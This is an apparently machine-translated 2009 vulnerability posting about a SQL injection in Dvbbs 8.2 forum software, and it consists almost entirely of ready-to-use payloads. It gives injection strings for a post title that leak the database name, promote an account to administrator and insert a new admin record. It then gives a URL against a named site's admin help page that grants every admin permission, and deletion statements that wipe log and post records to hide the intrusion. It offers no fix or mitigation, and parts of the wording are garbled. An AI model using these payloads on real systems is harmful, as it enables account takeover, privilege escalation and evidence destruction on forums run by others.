dvbbs 8. 2 reception 0day-vulnerability warning-the black bar safety net

2009-12-24T00:00:00
ID MYHACK58:62200925695
Type myhack58
Reporter 佚名
Modified 2009-12-24T00:00:00

Description

Small aviation blog Use: Posting, the title for the following sql statement, and then comments. 0 for neutral, 1 for support, 2 for the opposition. At this time sql statement is executed Library name: a’,’,1,’hang’,’2008-2-4’,’,2);update//dv_user//set//useremail=db_name()//where//username=’hang’-- Added front and back office administrator: a’,’,1,’hang’,’2008-2-4’,’,2);update dv_user set UserGroupID=1 where username=’hang’;insert into dv_admin(Username,Password,Flag,Adduser)values(’hang’,’965eb72c92a549dd’,’,4,’,’hang’)-- Into the background,by injecting and then get all the permissions: http://www.lnhonker.cn/Admin/help.asp?action=view&id=1;update//dv_admin//set//flag=’1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45’//where//username=’hang’-- Clean up the database record with three tables: the http://www.lnhonker.cn/Admin/help.asp?action=view&id=1;delete//from//dv_log//where//l_username=’hang’;delete//from//dv_topic// where//PostUsername=’hang’;delete//from//Dv_Appraise//where//UserName=’hang’-- (Because it is through the back injection to perform a delete statement, so the last Dv_log or is there an article on the background to help. asp file access recording)